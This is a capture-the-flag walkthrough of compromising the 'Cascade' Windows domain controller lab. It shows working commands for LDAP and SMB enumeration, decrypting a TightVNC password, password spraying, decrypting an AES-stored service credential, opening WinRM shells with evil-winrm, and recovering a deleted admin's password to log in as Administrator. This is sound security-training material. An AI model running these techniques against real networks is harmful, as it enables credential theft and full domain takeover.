Cascade is a medium Windows machine configured as a Domain Controller. LDAP anonymous binds are enabled, and enumeration yields the password for user r.thompson, which gives access to a TightVNC registry backup. The backup is decrypted to gain the password for s.smith. This user has access to a .NET executable, which after decompilation and source code analysis reveals the password for the ArkSvc account. This account belongs to the AD Recycle Bin group, and is able to view deleted Active Directory objects. One of the deleted user accounts is found to contain a hardcoded password, which can be reused to login as the primary domain administrator.

Initial Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-05 15:34:05Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49165/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

LDAP

Checking if Anonymous LDAP binding is enabled.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
$ ldapsearch -x -H ldap://10.10.10.182 -b "DC=cascade,DC=local" '(objectClass=person)'

<SNIP>
name: Ryan Thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 2
codePage: 0
countryCode: 0
badPasswordTime: 133856782280227955
lastLogoff: 0
lastLogon: 133856660661946343
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: r.thompson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 133856660661946343
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: <SNIP>
<SNIP>

This reveals a cascadeLegacyPwd for r.thompson. We can use base64 to decode this perhaps.

1
2
$ echo <SNIP> | base64 -d
<SNIP>

SMB

We can try r.thompson and the password we have to see what shares are available.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ nxc smb 10.10.10.182 -u r.thompson -p <SNIP> --shares

SMB         10.10.10.182    445    CASC-DC1         [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\r.thompson:<SNIP>
SMB         10.10.10.182    445    CASC-DC1         [*] Enumerated shares
SMB         10.10.10.182    445    CASC-DC1         Share           Permissions     Remark
SMB         10.10.10.182    445    CASC-DC1         -----           -----------     ------
SMB         10.10.10.182    445    CASC-DC1         ADMIN$                          Remote Admin
SMB         10.10.10.182    445    CASC-DC1         Audit$
SMB         10.10.10.182    445    CASC-DC1         C$                              Default share
SMB         10.10.10.182    445    CASC-DC1         Data            READ
SMB         10.10.10.182    445    CASC-DC1         IPC$                            Remote IPC
SMB         10.10.10.182    445    CASC-DC1         NETLOGON        READ            Logon server share
SMB         10.10.10.182    445    CASC-DC1         print$          READ            Printer Drivers
SMB         10.10.10.182    445    CASC-DC1         SYSVOL          READ            Logon server share

Getting a mix on tools and using smbmap we see whats in the Data share.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
$ smbmap -H 10.10.10.182 -u r.thompson -p <SNIP> -R Data
[+] IP: 10.10.10.182:445	Name: casc-dc1
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	Data                                              	READ ONLY	
	.\Data\*
	dr--r--r--                0 Tue Jan 28 16:05:51 2020	.
	dr--r--r--                0 Tue Jan 28 16:05:51 2020	..
	dr--r--r--                0 Sun Jan 12 19:45:14 2020	Contractors
	dr--r--r--                0 Sun Jan 12 19:45:10 2020	Finance
	dr--r--r--                0 Tue Jan 28 12:04:51 2020	IT
	dr--r--r--                0 Sun Jan 12 19:45:20 2020	Production
	dr--r--r--                0 Sun Jan 12 19:45:16 2020	Temps
	.\Data\IT\*
	dr--r--r--                0 Tue Jan 28 12:04:51 2020	.
	dr--r--r--                0 Tue Jan 28 12:04:51 2020	..
	dr--r--r--                0 Tue Jan 28 12:00:30 2020	Email Archives
	dr--r--r--                0 Tue Jan 28 12:04:51 2020	LogonAudit
	dr--r--r--                0 Tue Jan 28 18:53:04 2020	Logs
	dr--r--r--                0 Tue Jan 28 16:06:59 2020	Temp
	.\Data\IT\Email Archives\*
	dr--r--r--                0 Tue Jan 28 12:00:30 2020	.
	dr--r--r--                0 Tue Jan 28 12:00:30 2020	..
	fr--r--r--             2522 Tue Jan 28 12:00:30 2020	Meeting_Notes_June_2018.html
	.\Data\IT\Logs\*
	dr--r--r--                0 Tue Jan 28 18:53:04 2020	.
	dr--r--r--                0 Tue Jan 28 18:53:04 2020	..
	dr--r--r--                0 Tue Jan 28 18:53:04 2020	Ark AD Recycle Bin
	dr--r--r--                0 Tue Jan 28 18:56:00 2020	DCs
	.\Data\IT\Logs\Ark AD Recycle Bin\*
	dr--r--r--                0 Tue Jan 28 18:53:04 2020	.
	dr--r--r--                0 Tue Jan 28 18:53:04 2020	..
	fr--r--r--             1303 Tue Jan 28 19:19:11 2020	ArkAdRecycleBin.log
	.\Data\IT\Logs\DCs\*
	dr--r--r--                0 Tue Jan 28 18:56:00 2020	.
	dr--r--r--                0 Tue Jan 28 18:56:00 2020	..
	fr--r--r--             5967 Sun Jan 26 16:22:05 2020	dcdiag.log
	.\Data\IT\Temp\*
	dr--r--r--                0 Tue Jan 28 16:06:59 2020	.
	dr--r--r--                0 Tue Jan 28 16:06:59 2020	..
	dr--r--r--                0 Tue Jan 28 16:06:55 2020	r.thompson
	dr--r--r--                0 Tue Jan 28 14:00:05 2020	s.smith
	.\Data\IT\Temp\s.smith\*
	dr--r--r--                0 Tue Jan 28 14:00:05 2020	.
	dr--r--r--                0 Tue Jan 28 14:00:05 2020	..
	fr--r--r--             2680 Tue Jan 28 14:00:01 2020	VNC Install.reg

VNC Registry File

The VNC Install.reg was the only thing that held any real data we could use. After downloading it and opening it we see a password in hex for TightVNC.

Using a little trick I found on github for VNCDecrypt, I can decrpyt this hex password.

1
2
3
$ echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
00000000  73 54 33 33 33 76 65 32                           |<SNIP>|
00000008

Password Spraying

After getting this password, we try to spray the domain and came out successful.

1
2
3
4
5
$ nxc smb 10.10.10.182 -u users.lst -p <SNIP>
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\CascGuest:<SNIP> STATUS_LOGON_FAILURE
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\arksvc:<SNIP> STATUS_LOGON_FAILURE
SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\s.smith:<SNIP>

We got a hit on s.smith, so we can see what else they might have access to via SMB.

SMasHing SMB with s.smith

Looking into shares we see we have access the a Audit Share.

1
2
3
4
5
6
7
8
9
10
11
12
$ smbmap -H 10.10.10.182 -u s.smith -p <SNIP>
[+] IP: 10.10.10.182:445	Name: casc-dc1
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	Audit$                                            	READ ONLY	
	C$                                                	NO ACCESS	Default share
	Data                                              	READ ONLY	
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share
	print$                                            	READ ONLY	Printer Drivers
	SYSVOL                                            	READ ONLY	Logon server share

Looking into this share we have a couple of files and maybe a custom exe file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
$ smbmap -H 10.10.10.182 -u s.smith -p <SNIP> -R 'Audit$'
[+] IP: 10.10.10.182:445	Name: casc-dc1
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	Audit$                                            	READ ONLY	
	.\Audit$\*
	dr--r--r--                0 Wed Jan 29 12:01:26 2020	.
	dr--r--r--                0 Wed Jan 29 12:01:26 2020	..
	fr--r--r--            13312 Tue Jan 28 15:47:08 2020	CascAudit.exe
	fr--r--r--            12288 Wed Jan 29 12:01:26 2020	CascCrypto.dll
	dr--r--r--                0 Tue Jan 28 15:43:18 2020	DB
	fr--r--r--               45 Tue Jan 28 17:29:47 2020	RunAudit.bat
	fr--r--r--           363520 Tue Jan 28 14:42:18 2020	System.Data.SQLite.dll
	fr--r--r--           186880 Tue Jan 28 14:42:18 2020	System.Data.SQLite.EF6.dll
	dr--r--r--                0 Tue Jan 28 14:42:18 2020	x64
	dr--r--r--                0 Tue Jan 28 14:42:18 2020	x86
	.\Audit$\DB\*
	dr--r--r--                0 Tue Jan 28 15:43:18 2020	.
	dr--r--r--                0 Tue Jan 28 15:43:18 2020	..
	fr--r--r--            24576 Tue Jan 28 15:43:18 2020	Audit.db
	.\Audit$\x64\*
	dr--r--r--                0 Tue Jan 28 14:42:18 2020	.
	dr--r--r--                0 Tue Jan 28 14:42:18 2020	..
	fr--r--r--          1639936 Tue Jan 28 14:42:18 2020	SQLite.Interop.dll
	.\Audit$\x86\*
	dr--r--r--                0 Tue Jan 28 14:42:18 2020	.
	dr--r--r--                0 Tue Jan 28 14:42:18 2020	..
	fr--r--r--          1246720 Tue Jan 28 14:42:18 2020	SQLite.Interop.dll

Source Code Analysis

We can download CascAudit.exe and see what thats about. We get it to our Windows VM and open it in dnSpy, and look at the MainModule.

This shows us a part of the executable that uses sqlite to create an account over LDAP, I suppose. As well as a function Crypto that wasn’t mentioned in the code. So it must be in a dll on the share. Guess we’ll go find more in the Audit Share. We can grab the CascCrypto.dll and Audit.db and check these out. 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# Audit.db

$ sqlite3 10.10.10.182-Audit_DB_Audit.db '.dump'\
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE IF NOT EXISTS "Ldap" (
	"Id"	INTEGER PRIMARY KEY AUTOINCREMENT,
	"uname"	TEXT,
	"pwd"	TEXT,
	"domain"	TEXT
);
INSERT INTO Ldap VALUES(1,'ArkSvc','<BASE64>','cascade.local');
CREATE TABLE IF NOT EXISTS "Misc" (
	"Id"	INTEGER PRIMARY KEY AUTOINCREMENT,
<SNIP>

So we have a hash for the user ArkSvc. Next we look at the dll we got back in dnSpy.

We have the function Crypto and looking it over we see were using AES. Doing some research and looking at cipher mode CBC as mention in the dll code (aes.Mode = CipherMode.CBC;),we first we need to install pyaes (apt install python-pyaes). Then use python to decrypt the password we have from the sqlite database. 

1
2
3
4
5
6
7
8
9
10
11
12
$ python3
Python 3.11.2 (main, Nov 30 2024, 21:22:50) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pyaes
>>> from base64 import b64decode
>>> key = b'KEY'
>>> iv = b'IV'
>>> aes = pyaes.AESModeOfOperationCBC(key, iv = iv)
>>> decrypted = aes.decrypt(b64decode('<BASE64>'))
>>> print(decrypted.decode())
<SNIP>
>>>

We got the password for arksvc. We can check our access with nxc.

1
2
3
$ nxc winrm 10.10.10.182 -u arksvc -p <SNIP>
WINRM       10.10.10.182    5985   CASC-DC1         [*] Windows 7 / Server 2008 R2 Build 7601 (name:CASC-DC1) (domain:cascade.local)
WINRM       10.10.10.182    5985   CASC-DC1         [+] cascade.local\arksvc:<SNIP> (Pwn3d!)

Lets get access and snoop around.

Shell as arksvc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ evil-winrm -i 10.10.10.182 -u arksvc -p <SNIP>
<SNIP>

*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                            Attributes
=========================================== ================ ============================================== ===============================================================
Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share                          Alias            S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT                                  Alias            S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\AD Recycle Bin                      Alias            S-1-5-21-3332504370-1206983947-1165150453-1119 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users             Alias            S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group

We see were in the AD Recycle Bin Group, and looking online we find a github stating that the Group has the permissions to read deleted AD objects. We can try to see if there is anything that has been deleted.

PrivEsc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
<SNIP>
accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd                : <BASE64>
CN                              : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage                        : 0
countryCode                     : 0
Created                         : 1/27/2020 3:23:08 AM
<SNIP>

We happen to have another cascadeLegacyPwd we can decode.

1
2
$ echo <BASE64>| base64 -d
<SNIP>

Seeing as this was for the TempAdmin, we can try Administrator with this password.

1
2
3
4
5
6
7
8
9
10
11
12
$ evil-winrm -i 10.10.10.182 -u Administrator -p <SNIP>

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami;hostname
cascade\administrator
CASC-DC1